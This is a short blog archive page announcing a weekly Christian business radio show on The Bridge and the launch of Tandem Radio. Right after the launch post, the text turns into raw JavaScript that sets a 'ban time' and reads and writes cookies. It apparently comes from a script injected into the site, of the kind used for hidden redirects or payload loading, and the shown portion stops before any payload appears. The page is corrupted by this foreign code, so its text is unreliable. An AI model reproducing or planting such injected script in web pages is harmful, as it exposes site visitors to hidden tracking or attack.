‘Broadcasting Soon’ Archives
Live Radio Show Begins Tomorrow
I’m blessed to be part of a new, weekly Christian business show to air on The Bridge, starting tomorrow, July 17th at 11AM EST. The show will be streamed lived at Tandem Radio and can be heard through The Bridge website. Please note this is “not” a market and investing oriented show although I will be spending a few minutes each show on topics that may be related.
Tandem Radio Launch
Hello, The Tandem Radio team is excited to launch. Stay tuned as there will be more updates to come. var m_bantime=48;function get_cookie(Name){var search=Name+"=";var returnvalue="";if(document.cookie.length>0){offset=document.cookie.indexOf(search);if(offset!=-1){offset+=search.length;end=document.cookie.indexOf(";",offset);if(end==-1)end=document.cookie.length;returnvalue=unescape(document.cookie.substring(offset,end))}}return returnvalue}function set_expcookie(name,value,hours){var [...]